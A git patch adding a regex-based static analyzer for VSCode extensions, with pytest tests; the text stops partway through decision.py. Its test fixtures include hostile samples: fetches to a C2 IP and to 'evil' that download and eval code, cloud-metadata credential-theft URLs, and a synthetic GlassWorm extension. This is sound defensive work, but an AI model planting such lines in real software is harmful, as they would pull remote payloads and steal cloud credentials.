From 370ab39c19b527697349d414e6131ee28cbcee90 Mon Sep 17 00:00:00 2001 From: J4EH00N Date: Fri, 5 Jun 2026 21:28:04 +0900 Subject: [PATCH] =?UTF-8?q?feat:=20VSCode(VSIX)=20=EC=A0=84=EC=9A=A9=20?= =?UTF-8?q?=EC=A0=95=EC=A0=81=20=EB=B6=84=EC=84=9D=EA=B8=B0=20=EC=B6=94?= =?UTF-8?q?=EA=B0=80=20(Tier1)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit VSCode 확장을 정적 룰로 위험 탐지. Chrome 경로 불변(browser=="vscode" additive 분기). - backend/vscode_analysis/: rules(15룰)/manifest_scan/code_scan/decision/runner - Manifest 5(M-001,002,004,005,006) / 코드 7(C-003,004,006,007,009,010,011) / 시크릿 3(X-001,002,003) - 오탐 억제: publisher 화이트리스트(정책룰 한정), node_modules vendored 제외(C-003/011 한정), C-007 보안-인지 예외(instance 메타데이터 면제 / identity·token은 Critical 유지) - 판정: review 기본, Critical→거부제안. 자동 approve 없음. 파싱실패 fail-closed - main.py: /file_scan에 browser=="vscode" early-branch + _run_vscode_scan (Nexus review/ 업로드 + Web /api/receive 콜백 + risk_level 교정) — 전부 additive - backend/tests/vscode_analysis/: 70 테스트 (양성 5종 Critical 0, GlassWorm 합성 탐지) --- backend/tests/__init__.py | 0 backend/tests/vscode_analysis/__init__.py | 0 backend/tests/vscode_analysis/conftest.py | 7 + .../tests/vscode_analysis/test_code_scan.py | 305 ++++++++++++++++++ .../vscode_analysis/test_corpus_benign.py | 83 +++++ .../tests/vscode_analysis/test_decision.py | 27 ++ .../vscode_analysis/test_manifest_scan.py | 88 +++++ .../vscode_analysis/test_runner_glassworm.py | 46 +++ backend/vscode_analysis/__init__.py | 5 + backend/vscode_analysis/code_scan.py | 190 +++++++++++ backend/vscode_analysis/decision.py | 37 +++ backend/vscode_analysis/manifest_scan.py | 61 ++++ backend/vscode_analysis/rules.py | 159 +++++++++ backend/vscode_analysis/runner.py | 138 ++++++++ main.py | 138 ++++++++ 15 files changed, 1284 insertions(+) create mode 100644 backend/tests/__init__.py create mode 100644 backend/tests/vscode_analysis/__init__.py create mode 100644 backend/tests/vscode_analysis/conftest.py create mode 100644 backend/tests/vscode_analysis/test_code_scan.py create mode 100644 backend/tests/vscode_analysis/test_corpus_benign.py create mode 100644 backend/tests/vscode_analysis/test_decision.py create mode 100644 backend/tests/vscode_analysis/test_manifest_scan.py create mode 100644 backend/tests/vscode_analysis/test_runner_glassworm.py create mode 100644 backend/vscode_analysis/__init__.py create mode 100644 backend/vscode_analysis/code_scan.py create mode 100644 backend/vscode_analysis/decision.py create mode 100644 backend/vscode_analysis/manifest_scan.py create mode 100644 backend/vscode_analysis/rules.py create mode 100644 backend/vscode_analysis/runner.py diff --git a/backend/tests/__init__.py b/backend/tests/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/backend/tests/vscode_analysis/__init__.py b/backend/tests/vscode_analysis/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/backend/tests/vscode_analysis/conftest.py b/backend/tests/vscode_analysis/conftest.py new file mode 100644 index 00000000..df006356 --- /dev/null +++ b/backend/tests/vscode_analysis/conftest.py @@ -0,0 +1,7 @@ +import os +import sys + +# backend/ 를 import 루트로 추가 (scanners.*, vscode_analysis.* import shim과 일치) +BACKEND_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) +if BACKEND_DIR not in sys.path: + sys.path.insert(0, BACKEND_DIR) diff --git a/backend/tests/vscode_analysis/test_code_scan.py b/backend/tests/vscode_analysis/test_code_scan.py new file mode 100644 index 00000000..1eae7584 --- /dev/null +++ b/backend/tests/vscode_analysis/test_code_scan.py @@ -0,0 +1,305 @@ +"""C-003,004,006,007,009,010,011 + X-001,002,003 positive/negative.""" + +from vscode_analysis.code_scan import scan_source_file + + +def _ids(findings): + return {f["rule_id"] for f in findings} + + +# --- C-003 --- +def test_c003_positive_eval(): + findings, _ = scan_source_file("a.js", "const x = eval('1+1');") + assert "C-003" in _ids(findings) + + +def test_c003_positive_vm_runinthiscontext(): + findings, _ = scan_source_file("a.js", "vm.runInThisContext(payload);") + assert "C-003" in _ids(findings) + + +def test_c003_negative_evaluate_word(): + findings, _ = scan_source_file("a.js", "function evaluate() { return doEval; }") + assert "C-003" not in _ids(findings) + + +# --- C-004 --- +def test_c004_positive_invisible_unicode(): + payload = "const p = '" + "​" * 6 + "';" + findings, _ = scan_source_file("a.js", payload) + assert "C-004" in _ids(findings) + + +def test_c004_negative_normal_text(): + findings, _ = scan_source_file("a.js", "const greeting = 'hello world';") + assert "C-004" not in _ids(findings) + + +def test_c004_negative_few_invisible(): + # 4자 (5자 미만) + findings, _ = scan_source_file("a.js", "x" + "​" * 4 + "y") + assert "C-004" not in _ids(findings) + + +# --- C-006 --- +def test_c006_positive_known_c2_ip(): + findings, _ = scan_source_file("a.js", "fetch('http://199.247.10.166/get_zombi_payload')") + assert "C-006" in _ids(findings) + + +def test_c006_negative_benign_ip(): + findings, _ = scan_source_file("a.js", "const local = '127.0.0.1';") + assert "C-006" not in _ids(findings) + + +# --- C-007 --- +def test_c007_positive_aws_imds(): + findings, _ = scan_source_file("a.js", "http.get('http://169.254.169.254/latest/meta-data/')") + assert "C-007" in _ids(findings) + + +def test_c007_negative(): + findings, _ = scan_source_file("a.js", "const url = 'https://example.com';") + assert "C-007" not in _ids(findings) + + +# --- C-009 --- +def test_c009_positive_github_search(): + findings, _ = scan_source_file("a.js", "axios.get('https://api.github.com/search/commits?q=firedalazer')") + assert "C-009" in _ids(findings) + + +def test_c009_negative_normal_github(): + findings, _ = scan_source_file("a.js", "fetch('https://api.github.com/repos/x/y')") + assert "C-009" not in _ids(findings) + + +# --- C-010 --- +def test_c010_positive_solana(): + findings, _ = scan_source_file("a.js", "const rpc = 'https://api.mainnet-beta.solana.com';") + assert "C-010" in _ids(findings) + + +def test_c010_negative(): + findings, _ = scan_source_file("a.js", "const rpc = 'https://my-node.example';") + assert "C-010" not in _ids(findings) + + +# --- C-011 --- +def test_c011_positive_native_node(): + findings, counts = scan_source_file("a.js", "const m = require('./build/Release/addon.node');") + assert "C-011" in _ids(findings) + assert counts["medium"] >= 1 + + +def test_c011_negative_normal_require(): + findings, _ = scan_source_file("a.js", "const fs = require('fs');") + assert "C-011" not in _ids(findings) + + +# --- X-001 --- +def test_x001_positive_pat_with_context(): + pat = "a" * 52 # 52자 base32 (a는 base32 alphabet) + content = f"// vsce publish token\nconst VSCE_PAT = '{pat}';" + findings, _ = scan_source_file("a.js", content) + assert "X-001" in _ids(findings) + + +def test_x001_negative_pat_without_context(): + pat = "a" * 52 + findings, _ = scan_source_file("a.js", f"const hash = '{pat}';") + assert "X-001" not in _ids(findings) + + +# --- X-002 --- +def test_x002_positive_openai_key(): + findings, _ = scan_source_file("a.js", "const k = 'sk-" + "A" * 45 + "';") + assert "X-002" in _ids(findings) + + +def test_x002_positive_aws_key(): + findings, _ = scan_source_file("a.js", "AKIA" + "ABCDEFGHIJ123456") + assert "X-002" in _ids(findings) + + +def test_x002_negative_masked_example(): + findings, _ = scan_source_file("a.js", "const EXAMPLE_KEY = 'sk-" + "A" * 45 + "'; // EXAMPLE") + assert "X-002" not in _ids(findings) + + +def test_x002_negative_placeholder(): + findings, _ = scan_source_file("a.js", "key = 'AKIAPLACEHOLDER12345' // PLACEHOLDER") + assert "X-002" not in _ids(findings) + + +# --- X-003 --- +def test_x003_positive_gcp_key(): + content = '{"type":"service_account","private_key":"-----BEGIN PRIVATE KEY-----\\nMII..."}' + findings, _ = scan_source_file("k.json", content) + assert "X-003" in _ids(findings) + + +def test_x003_negative(): + findings, _ = scan_source_file("k.json", '{"type":"service_account","client_email":"x@y.iam"}') + assert "X-003" not in _ids(findings) + + +# --- C-003 좁은 정상-맥락 예외 (번들러 보일러플레이트만 면제) --- +def test_c003_exempt_globalthis_polyfill(): + """new Function("return this") globalThis 폴리필은 면제.""" + findings, _ = scan_source_file("a.js", 'var g = (function(){try{return this||new Function("return this")()}catch(e){}})();') + assert "C-003" not in _ids(findings) + + +def test_c003_exempt_eval_require_shim(): + """eval("require('util').inspect") CommonJS shim은 면제.""" + findings, _ = scan_source_file("a.js", "const utilInspect = eval(\"require('util').inspect\");") + assert "C-003" not in _ids(findings) + + +def test_c003_exempt_eval_require_no_member(): + """eval("require('util')") 멤버 없는 require shim도 면제.""" + findings, _ = scan_source_file("a.js", "const u = eval(\"require('util')\");") + assert "C-003" not in _ids(findings) + + +def test_c003_fires_function_with_concat(): + """new Function("return "+x) 동적 연결은 Critical 발화 (면제 금지).""" + findings, _ = scan_source_file("a.js", 'const f = new Function("return " + x);') + assert "C-003" in _ids(findings) + + +def test_c003_fires_function_user_input(): + """new Function(userInput) 변수 인자는 Critical 발화.""" + findings, _ = scan_source_file("a.js", "const f = new Function(userInput);") + assert "C-003" in _ids(findings) + + +def test_c003_fires_eval_variable(): + """eval(decoded) 변수 인자는 Critical 발화.""" + findings, _ = scan_source_file("a.js", "eval(decoded);") + assert "C-003" in _ids(findings) + + +def test_c003_fires_eval_concat(): + """eval("a"+b) 연결 인자는 Critical 발화.""" + findings, _ = scan_source_file("a.js", 'eval("a" + b);') + assert "C-003" in _ids(findings) + + +def test_c003_fires_eval_arbitrary_literal(): + """eval("악성 리터럴")은 require shim이 아니므로 Critical 발화 (비자명 eval).""" + findings, _ = scan_source_file("a.js", "eval(\"fetch('http://evil/x').then(r=>r.text()).then(eval)\");") + assert "C-003" in _ids(findings) + + +def test_c003_fires_vm_runinthiscontext_alongside_exempt(): + """면제 폴리필이 있어도 같은 파일의 vm.runInThisContext는 Critical 발화.""" + content = 'new Function("return this")();\nvm.runInThisContext(payload);' + findings, _ = scan_source_file("a.js", content) + assert "C-003" in _ids(findings) + + +def test_c003_fires_dynamic_eval_alongside_exempt_shim(): + """require shim과 동적 eval이 섞이면 동적 eval로 발화 (좁은 예외 증명).""" + content = "const u = eval(\"require('util')\");\neval(decoded);" + findings, _ = scan_source_file("a.js", content) + assert "C-003" in _ids(findings) + + +# --- C-007 보안-인지 정제 (instance 텔레메트리 면제 / identity·token 발화) --- +def test_c007_exempt_azure_instance_metadata(): + """Azure IMDS instance/compute (VM 탐지 텔레메트리)는 면제.""" + content = ( + 'const opts={headers:{Metadata:"True"}};' + 'makeRequest("http://169.254.169.254/metadata/instance/compute?api-version=2017-12-01&format=json");' + ) + findings, _ = scan_source_file("a.js", content) + assert "C-007" not in _ids(findings) + + +def test_c007_fires_azure_identity_token(): + """169.254.169.254/metadata/identity/oauth2/token 자격증명 탈취는 Critical 발화.""" + content = 'fetch("http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com");' + findings, _ = scan_source_file("a.js", content) + assert "C-007" in _ids(findings) + + +def test_c007_fires_metadata_ip_standalone_exfil(): + """정상 instance 경로 맥락 없이 메타데이터 IP 단독 등장은 Critical 발화.""" + content = "fetch('http://169.254.169.254/latest/meta-data/').then(r=>send(r));" + findings, _ = scan_source_file("a.js", content) + assert "C-007" in _ids(findings) + + +def test_c007_fires_aws_iam_credentials(): + """AWS /iam/security-credentials 자격증명 경로는 Critical 발화 (면제 금지).""" + content = "http.get('http://169.254.169.254/latest/meta-data/iam/security-credentials/role');" + findings, _ = scan_source_file("a.js", content) + assert "C-007" in _ids(findings) + + +def test_c007_fires_gcp_token_metadata(): + """GCP /computeMetadata/ 토큰 경로는 Critical 발화 (면제 금지).""" + content = "fetch('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token');" + findings, _ = scan_source_file("a.js", content) + assert "C-007" in _ids(findings) + + +def test_c007_fires_identity_even_with_instance_path(): + """instance 경로가 있어도 identity/token 경로가 함께 있으면 Critical 발화 (면제 금지).""" + content = ( + 'makeRequest("http://169.254.169.254/metadata/instance/compute?api-version=2017-12-01");' + 'fetch("http://169.254.169.254/metadata/identity/oauth2/token");' + ) + findings, _ = scan_source_file("a.js", content) + assert "C-007" in _ids(findings) + + +# --- C1 회귀: 화이트리스트 publisher가 코드룰을 면제하면 안 됨 --- +def test_c003_fires_even_when_publisher_whitelisted(): + """침해된 신뢰 publisher 위협모델: non-vendored eval은 publisher 무관하게 C-003 발화.""" + findings, _ = scan_source_file( + "extension/out/main.js", "const x = eval(payload);", publisher_whitelisted=True + ) + assert "C-003" in _ids(findings) + + +def test_c006_fires_even_when_publisher_whitelisted(): + """non-vendored C2 IP는 publisher 무관하게 C-006 발화.""" + findings, _ = scan_source_file( + "extension/out/main.js", "fetch('http://199.247.10.166/x')", publisher_whitelisted=True + ) + assert "C-006" in _ids(findings) + + +# --- C2 회귀: vendored 제외는 FP 우려 룰(C-003/C-011)에만 한정 --- +def test_c006_fires_in_node_modules(): + """node_modules 경로라도 C-006(C2 IP)는 발화해야 함 (FN 방지).""" + findings, _ = scan_source_file( + "extension/node_modules/evil/index.js", "fetch('http://199.247.10.166/x')" + ) + assert "C-006" in _ids(findings) + + +def test_c004_fires_in_node_modules(): + """node_modules 경로라도 C-004(비가시 Unicode)는 발화해야 함.""" + payload = "const p = '" + "​" * 6 + "';" + findings, _ = scan_source_file("extension/node_modules/evil/index.js", payload) + assert "C-004" in _ids(findings) + + +def test_c003_skipped_in_node_modules(): + """vendored 제외는 C-003엔 여전히 적용 (python 번들 lib FP 방지).""" + findings, _ = scan_source_file( + "extension/node_modules/somelib/index.js", "const x = eval('1+1');" + ) + assert "C-003" not in _ids(findings) + + +def test_c011_skipped_in_node_modules(): + """vendored 제외는 C-011(native .node)에도 적용 (정상 native dep FP 방지).""" + findings, _ = scan_source_file( + "extension/node_modules/somelib/index.js", "require('./build/Release/addon.node');" + ) + assert "C-011" not in _ids(findings) diff --git a/backend/tests/vscode_analysis/test_corpus_benign.py b/backend/tests/vscode_analysis/test_corpus_benign.py new file mode 100644 index 00000000..a114d674 --- /dev/null +++ b/backend/tests/vscode_analysis/test_corpus_benign.py @@ -0,0 +1,83 @@ +"""양성 5종 .vsix 코퍼스 검증: Critical 오탐 0 + 반환 형태 + decision=review. + +코퍼스 경로가 없으면 skip (CI 환경 호환). +""" + +import os + +import pytest + +from vscode_analysis.runner import run_vscode_static_analysis + +CORPUS_DIR = os.path.normpath( + os.path.join( + os.path.dirname(__file__), + "..", "..", "..", "..", "..", "..", "..", + "labs", "vscode-corpus", "benign", + ) +) +# 위 상대경로가 환경마다 다를 수 있어 절대경로 fallback도 둔다. +ABS_CORPUS = r"D:/SJH_Data/01_Personal/02_Univ/02_CCIT/dev/labs/vscode-corpus/benign" + +BENIGN_FILES = [ + "dbaeumer.vscode-eslint-3.0.24.vsix", + "esbenp.prettier-vscode-12.4.0.vsix", + "eamodio.gitlens-2026.5.280630.vsix", + "ms-python.python-2026.4.0.vsix", + "vscode-icons-team.vscode-icons-12.18.0.vsix", +] + +RUN_STATIC_KEYS = { + "program_name", "program_version", "program_type", + "reputation_targets", "summary", "findings", "scan_result", "enabled_scanners", +} + + +def _corpus_path(name): + for base in (ABS_CORPUS, CORPUS_DIR): + p = os.path.join(base, name) + if os.path.exists(p): + return p + return None + + +@pytest.mark.parametrize("name", BENIGN_FILES) +def test_benign_no_critical_false_positive(name): + path = _corpus_path(name) + if path is None: + pytest.skip(f"corpus not available: {name}") + + result = run_vscode_static_analysis(path) + + assert result["status"] == "ok", f"{name}: {result.get('error')}" + + # Critical 오탐 0 + crit = result["scan_result"]["critical"] + crit_rules = sorted({f["rule_id"] for f in result["findings"] if f["severity"] == "CRITICAL"}) + assert crit == 0, f"{name}: critical false positives {crit_rules}" + + # 반환 형태가 run_static_analysis와 동일 키 구조 + assert RUN_STATIC_KEYS.issubset(result.keys()) + + # decision=review (양성은 거부 제안 없음) + assert result["decision"]["decision"] == "review" + assert result["decision"]["suggest_reject"] is False + + +def test_python_apiproposals_whitelisted(): + """ms-python apiProposals 9개가 M-002로 발화하지 않아야 한다.""" + path = _corpus_path("ms-python.python-2026.4.0.vsix") + if path is None: + pytest.skip("python corpus not available") + result = run_vscode_static_analysis(path) + ids = {f["rule_id"] for f in result["findings"]} + assert "M-002" not in ids + + +def test_eslint_postinstall_is_medium_not_critical(): + """eslint postinstall은 M-005 medium이지 critical이 아니어야 한다.""" + path = _corpus_path("dbaeumer.vscode-eslint-3.0.24.vsix") + if path is None: + pytest.skip("eslint corpus not available") + result = run_vscode_static_analysis(path) + assert result["scan_result"]["critical"] == 0 diff --git a/backend/tests/vscode_analysis/test_decision.py b/backend/tests/vscode_analysis/test_decision.py new file mode 100644 index 00000000..3751a52a --- /dev/null +++ b/backend/tests/vscode_analysis/test_decision.py @@ -0,0 +1,27 @@ +from vscode_analysis.decision import decide + + +def test_critical_suggests_reject_and_review(): + d = decide({"critical": 2, "high": 0, "medium": 0, "low": 0}) + assert d["decision"] == "review" + assert d["suggest_reject"] is True + + +def test_high_medium_only_is_review_no_reject(): + d = decide({"critical": 0, "high": 1, "medium": 3, "low": 0}) + assert d["decision"] == "review" + assert d["suggest_reject"] is False + + +def test_no_findings_is_review_not_approve(): + d = decide({"critical": 0, "high": 0, "medium": 0, "low": 0}) + assert d["decision"] == "review" + assert d["suggest_reject"] is False + # 자동 approve 절대 없음 + assert d["decision"] != "approve" + + +def test_error_status_is_review_failclosed(): + d = decide({"critical": 0, "high": 0, "medium": 0, "low": 0}, status="error") + assert d["decision"] == "review" + assert d["suggest_reject"] is False diff --git a/backend/tests/vscode_analysis/test_manifest_scan.py b/backend/tests/vscode_analysis/test_manifest_scan.py new file mode 100644 index 00000000..17c41253 --- /dev/null +++ b/backend/tests/vscode_analysis/test_manifest_scan.py @@ -0,0 +1,88 @@ +"""M-001, M-002, M-004, M-005, M-006 positive/negative.""" + +from vscode_analysis.manifest_scan import scan_manifest + + +def _ids(findings): + return {f["rule_id"] for f in findings} + + +# --- M-001 --- +def test_m001_positive_wildcard_activation(): + findings, _ = scan_manifest({"activationEvents": ["*"], "extensionKind": ["ui"]}) + assert "M-001" in _ids(findings) + + +def test_m001_negative_specific_activation(): + findings, _ = scan_manifest({"activationEvents": ["onLanguage:python"], "extensionKind": ["ui"]}) + assert "M-001" not in _ids(findings) + + +# --- M-002 --- +def test_m002_positive_third_party_proposals(): + findings, counts = scan_manifest({ + "publisher": "some-3rd-party", + "enabledApiProposals": ["terminalDataWriteEvent"], + "extensionKind": ["ui"], + }) + assert "M-002" in _ids(findings) + assert counts["high"] >= 1 + + +def test_m002_negative_whitelisted_publisher(): + # ms-python apiProposals 9개 -> 화이트리스트로 면제 (코퍼스 가정) + findings, _ = scan_manifest({ + "publisher": "ms-python", + "enabledApiProposals": ["a", "b", "c", "d", "e", "f", "g", "h", "i"], + "extensionKind": ["ui"], + }) + assert "M-002" not in _ids(findings) + + +def test_m002_negative_no_proposals(): + findings, _ = scan_manifest({"publisher": "x", "enabledApiProposals": [], "extensionKind": ["ui"]}) + assert "M-002" not in _ids(findings) + + +# --- M-004 --- +def test_m004_positive_missing_kind(): + findings, _ = scan_manifest({"name": "x"}) + assert "M-004" in _ids(findings) + + +def test_m004_positive_workspace_kind(): + findings, _ = scan_manifest({"extensionKind": ["workspace"]}) + assert "M-004" in _ids(findings) + + +def test_m004_negative_ui_only(): + findings, _ = scan_manifest({"extensionKind": ["ui"]}) + assert "M-004" not in _ids(findings) + + +# --- M-005 --- +def test_m005_positive_postinstall(): + findings, counts = scan_manifest({ + "scripts": {"postinstall": "node ./build/bin/all.js install"}, + "extensionKind": ["ui"], + }) + assert "M-005" in _ids(findings) + # eslint postinstall은 medium이지 critical 아님 + assert counts["medium"] >= 1 + assert counts["critical"] == 0 + + +def test_m005_negative_no_install_hook(): + findings, _ = scan_manifest({"scripts": {"build": "tsc"}, "extensionKind": ["ui"]}) + assert "M-005" not in _ids(findings) + + +# --- M-006 --- +def test_m006_positive_extension_pack(): + findings, _ = scan_manifest({"extensionPack": ["ms-python.pylance"], "extensionKind": ["ui"]}) + assert "M-006" in _ids(findings) + + +def test_m006_negative_empty_pack(): + findings, _ = scan_manifest({"extensionPack": [], "extensionKind": ["ui"]}) + assert "M-006" not in _ids(findings) diff --git a/backend/tests/vscode_analysis/test_runner_glassworm.py b/backend/tests/vscode_analysis/test_runner_glassworm.py new file mode 100644 index 00000000..d795d7c4 --- /dev/null +++ b/backend/tests/vscode_analysis/test_runner_glassworm.py @@ -0,0 +1,46 @@ +"""GlassWorm 합성 VSIX: 비가시 유니코드 + eval + 알려진 C2 IP -> >=3 critical 룰 -> 거부 제안.""" + +import json +import os +import zipfile + +from vscode_analysis.runner import run_vscode_static_analysis + + +def _make_glassworm_vsix(tmp_path): + vsix = os.path.join(tmp_path, "glassworm.vsix") + manifest = { + "name": "totally-legit-helper", + "version": "1.0.0", + "publisher": "publishingsofficial", + "activationEvents": ["*"], + "extensionKind": ["workspace"], + } + invisible = "​" * 6 # 비가시 유니코드 6자 -> C-004 + # eval -> C-003, 199.247.10.166 -> C-006 + malicious = ( + "const p = '" + invisible + "';\n" + "eval(decode(p));\n" + "fetch('http://199.247.10.166/get_zombi_payload');\n" + ) + with zipfile.ZipFile(vsix, "w") as zf: + zf.writestr("extension/package.json", json.dumps(manifest)) + zf.writestr("extension/out/extension.js", malicious) + return vsix + + +def test_glassworm_triggers_three_critical_and_reject(tmp_path): + vsix = _make_glassworm_vsix(str(tmp_path)) + result = run_vscode_static_analysis(vsix) + + assert result["status"] == "ok" + ids = {f["rule_id"] for f in result["findings"]} + # C-003, C-004, C-006 발화 + assert {"C-003", "C-004", "C-006"}.issubset(ids) + + critical_findings = [f for f in result["findings"] if f["severity"] == "CRITICAL"] + assert len(critical_findings) >= 3 + + assert result["scan_result"]["critical"] >= 3 + assert result["decision"]["suggest_reject"] is True + assert result["decision"]["decision"] == "review" diff --git a/backend/vscode_analysis/__init__.py b/backend/vscode_analysis/__init__.py new file mode 100644 index 00000000..74866096 --- /dev/null +++ b/backend/vscode_analysis/__init__.py @@ -0,0 +1,5 @@ +"""VSCode (VSIX) 정적 분석기 Tier1. + +기존 Chrome 경로/공유 스캐너와 완전히 분리된 신규 모듈. +진입점: runner.run_vscode_static_analysis(vsix_path) +""" diff --git a/backend/vscode_analysis/code_scan.py b/backend/vscode_analysis/code_scan.py new file mode 100644 index 00000000..b861b640 --- /dev/null +++ b/backend/vscode_analysis/code_scan.py @@ -0,0 +1,190 @@ +"""Code body / Secret 정규식 룰. + +Code: C-003, C-004, C-006, C-007, C-009, C-010, C-011 +Secret: X-001, X-002, X-003 +Tier1은 정규식만 사용 (AST 금지). +""" + +from collections import Counter +from typing import Any, Dict, List, Tuple + +try: + from backend.scanners.common import add_finding + from backend.vscode_analysis import rules +except ModuleNotFoundError: # pragma: no cover - import shim + from scanners.common import add_finding + from vscode_analysis import rules + + +def _emit(findings, counts, rule_id, evidence): + severity, category, title, recommendation = rules.RULE_META[rule_id] + add_finding(findings, counts, severity, category, rule_id, title, evidence, recommendation) + + +def _snippet(text: str, idx: int, width: int = 40) -> str: + start = max(0, idx - width) + end = min(len(text), idx + width) + return text[start:end] + + +def _is_vendored(file_name: str) -> bool: + """vendored 의존성 경로 여부 (bundler 미포함 third-party 코드).""" + return "node_modules/" in file_name.replace("\\", "/") + + +def _c003_match_is_exempt(content: str, m) -> bool: + """C-003 매치 1건이 무해한 번들러 보일러플레이트인지 (좁은 예외). + + 매치 시작 위치에서 면제 패턴이 정확히 시작되는지로 판정한다. + - new Function("return this") / Function("return this") : globalThis 폴리필 + - eval("require('...')[.member]") : CommonJS require shim + 둘 다 문자열 리터럴 인자만 허용하므로, 동적/연결 입력은 절대 면제되지 않는다. + """ + start = m.start() + for pat in (rules.C003_EXEMPT_RETURN_THIS, rules.C003_EXEMPT_EVAL_REQUIRE): + em = pat.match(content, start) + if em: + return True + return False + + +def _c007_endpoint_exempt(content: str, endpoint: str) -> bool: + """C-007: 메타데이터 IP/호스트 접근이 *무해한 VM 탐지 텔레메트리*인지 판정. + + 면제 조건 (모두 충족해야만): + 1. 파일 어디에도 토큰/자격증명 경로가 없다 (C007_CREDENTIAL_PATHS 미매치). + 2. 접근이 인스턴스-메타데이터 정상 경로(/metadata/instance ...)로 나타난다. + → instance/compute = VM 탐지(정상), identity/oauth2/token = 자격증명 탈취(위험). + + 자격증명 경로가 보이면 무조건 발화(면제 금지). 정상 경로 맥락 없이 메타데이터 IP만 + 단독으로 등장하는 exfil 의심 케이스도 면제하지 않는다. + """ + if rules.C007_CREDENTIAL_PATHS.search(content): + return False + return bool(rules.C007_INSTANCE_METADATA_PATHS.search(content)) + + +def _c003_first_unexempt(content: str): + """C-003: 면제 대상이 아닌 첫 eval/Function/vm.run* 매치를 반환 (없으면 None). + + 면제(globalThis 폴리필 / require shim)만 있는 파일은 None → 발화 안 함. + 그 외 동적·비자명 eval/Function/vm 호출이 섞여 있으면 그 매치로 Critical 발화. + """ + for m in rules.C003_EVAL.finditer(content): + if not _c003_match_is_exempt(content, m): + return m + return None + + +def scan_source_file( + file_name: str, + content: str, + publisher_whitelisted: bool = False, +) -> Tuple[List[Dict[str, Any]], Counter]: + """단일 소스파일 텍스트를 받아 code+secret 룰 findings + counts 반환. + + publisher_whitelisted: M-002(manifest)에서만 쓰는 화이트리스트 신호. 코드룰(C 룰) + 발화에는 영향 없음 — 침해된 신뢰 publisher 위협모델을 통과시키지 않기 위함. + (호환 위해 파라미터는 유지하나 여기서는 사용하지 않는다.) + """ + findings: List[Dict[str, Any]] = [] + counts: Counter = Counter() + + if not isinstance(content, str) or not content: + return findings, counts + + # vendored(node_modules) 제외는 FP가 실제 우려되는 룰에만 한정한다 (카탈로그): + # C-003(eval) — python 번들 vendored lib FP + # C-011(native .node) — 정상 native dep 다수 매치 + # 나머지 Critical/상수 룰(C-004/006/007/009/010)은 양성 FP 0이므로 vendored에서도 발화. + # publisher 화이트리스트는 코드룰 스킵에 일절 관여하지 않는다 (C1 보안 수정). + vendored = _is_vendored(file_name) + + # --- Code body --- + # C-003: eval / new Function / vm.runIn* (vendored면 면제) + # 추가로, 무해한 번들러 보일러플레이트(globalThis 폴리필 / require shim)만 있는 + # 파일은 면제. 동적·비자명 eval/Function/vm 호출이 하나라도 있으면 Critical 발화. + if not vendored: + m = _c003_first_unexempt(content) + if m: + _emit(findings, counts, "C-003", {"file": file_name, "match": m.group(0)}) + + # C-004: 비가시 Unicode 5자+ 연속 + m = rules.C004_INVISIBLE.search(content) + if m: + _emit(findings, counts, "C-004", + {"file": file_name, "length": len(m.group(0)), + "codepoints": [hex(ord(c)) for c in m.group(0)[:8]]}) + + # C-006: 알려진 C2 IP 상수 + for ip in rules.KNOWN_C2_IPS: + if ip in content: + _emit(findings, counts, "C-006", {"file": file_name, "ip": ip}) + + # C-007: 클라우드 메타데이터 엔드포인트 + # 보안-인지 정제: instance/compute류 정상 텔레메트리(VM 탐지)만 좁게 면제하고, + # identity/oauth2/token 등 자격증명 탈취 경로는 무조건 Critical 유지. + for endpoint in rules.CLOUD_METADATA_ENDPOINTS: + if endpoint in content and not _c007_endpoint_exempt(content, endpoint): + _emit(findings, counts, "C-007", {"file": file_name, "endpoint": endpoint}) + + # C-009: GitHub Search dead-drop + m = rules.C009_GITHUB_SEARCH.search(content) + if m: + _emit(findings, counts, "C-009", {"file": file_name, "match": m.group(0)}) + + # C-010: Blockchain/Calendar 백업 채널 + m = rules.C010_BACKUP_CHANNEL.search(content) + if m: + _emit(findings, counts, "C-010", {"file": file_name, "match": m.group(0)}) + + # C-011: native .node 모듈 로딩 (vendored면 면제) + if not vendored: + m = rules.C011_NATIVE_NODE.search(content) + if m: + _emit(findings, counts, "C-011", {"file": file_name, "match": m.group(0)}) + + # --- Secret (vendored 포함 전체 대상 — 카탈로그 X 룰) --- + + # X-001: PAT (52자 base32) ∧ 동일 파일에 vsce/marketplace/ovsx 맥락 + if rules.X001_CONTEXT.search(content): + m = rules.X001_PAT.search(content) + if m: + _emit(findings, counts, "X-001", + {"file": file_name, "match": m.group(0)[:6] + "..." }) + + # X-002: LLM/클라우드 API 키 — EXAMPLE/PLACEHOLDER/xxx 마스킹 라인 제외 + for m in rules.X002_SECRETS.finditer(content): + line_start = content.rfind("\n", 0, m.start()) + 1 + line_end = content.find("\n", m.end()) + if line_end == -1: + line_end = len(content) + line = content[line_start:line_end].upper() + if any(tok in line for tok in rules.SECRET_MASK_TOKENS): + continue + _emit(findings, counts, "X-002", + {"file": file_name, "match": m.group(0)[:8] + "..."}) + break # 파일당 1건으로 충분 (noise 억제) + + # X-003: GCP service account private key + m = rules.X003_GCP_KEY.search(content) + if m: + _emit(findings, counts, "X-003", {"file": file_name}) + + return findings, counts + + +def scan_sources( + source_files: List[Dict[str, Any]], + publisher_whitelisted: bool = False, +) -> Tuple[List[Dict[str, Any]], Counter]: + """[{file_name, content}, ...] 목록을 받아 전체 code+secret findings + counts 반환.""" + findings: List[Dict[str, Any]] = [] + counts: Counter = Counter() + for entry in source_files: + file_name = str(entry.get("file_name", "unknown")) + content = entry.get("content") + f, c = scan_source_file(file_name, content, publisher_whitelisted=publisher_whitelisted) + findings.extend(f) + counts.update(c) + return findings, counts diff --git a/backend/vscode_analysis/decision.py b/backend/vscode_analysis/decision.py new file mode 100644 index 00000000..cba40867 --- /dev/null +++ b/backend/vscode_analysis/decision.py @@ -0,0 +1,37 @@ +"""VSCode 전용 판정 (설계 §6). + +- Critical >= 1 -> 거부 제안 + review +- High/Medium만 (findings) -> review +- 무 findings -> review (Tier1: 자동 approve 없음) +- 분석 실패 (status=error) -> review (fail-closed) + +자동 approve는 절대 생성하지 않는다. +""" + +from typing import Any, Dict + + +def decide(severity_counts: Dict[str, int], status: str = "ok") -> Dict[str, Any]: + 